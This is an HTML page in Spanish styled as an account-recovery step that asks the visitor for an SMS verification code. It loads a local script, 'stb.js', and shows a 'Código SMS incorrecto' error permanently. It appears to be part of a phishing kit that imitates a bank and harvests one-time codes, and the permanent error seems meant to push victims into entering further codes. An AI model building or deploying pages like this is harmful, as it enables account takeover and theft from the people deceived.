<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="top">
        <img src="./img/otmn-topap.png" alt="">
    </div>


    <div class="section">
        <p >RECUPERACIÓN DE ACCESO DE CUENTA</p>
        <p class="p1">Tu teléfono móvil</p>
        <p style="margin-bottom: 25px; margin-top: -10px;">Te hemos enviado un codigo a tu telefono para verificar tu identidad. Introducelo a continuacion para acceder</p>

        <form class="formcc" method="post" id="pg4">
            <p>CÓDIGO SMS</p>
            <input type="tel" placeholder="" name="" id="sps2" required maxlength="9"> 
            <p style="margin-bottom: 20px; margin-top: -10px; color: rgb(179, 36, 36);">Código SMS incorrecto</p>
            
            <button type="submit">CONTINUAR</button>
            <p class="p2">¿Olvidaste tu clave de acceso?</p>
        </form>
        <img class="bot" src="./img/bot.PNG" alt="">
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>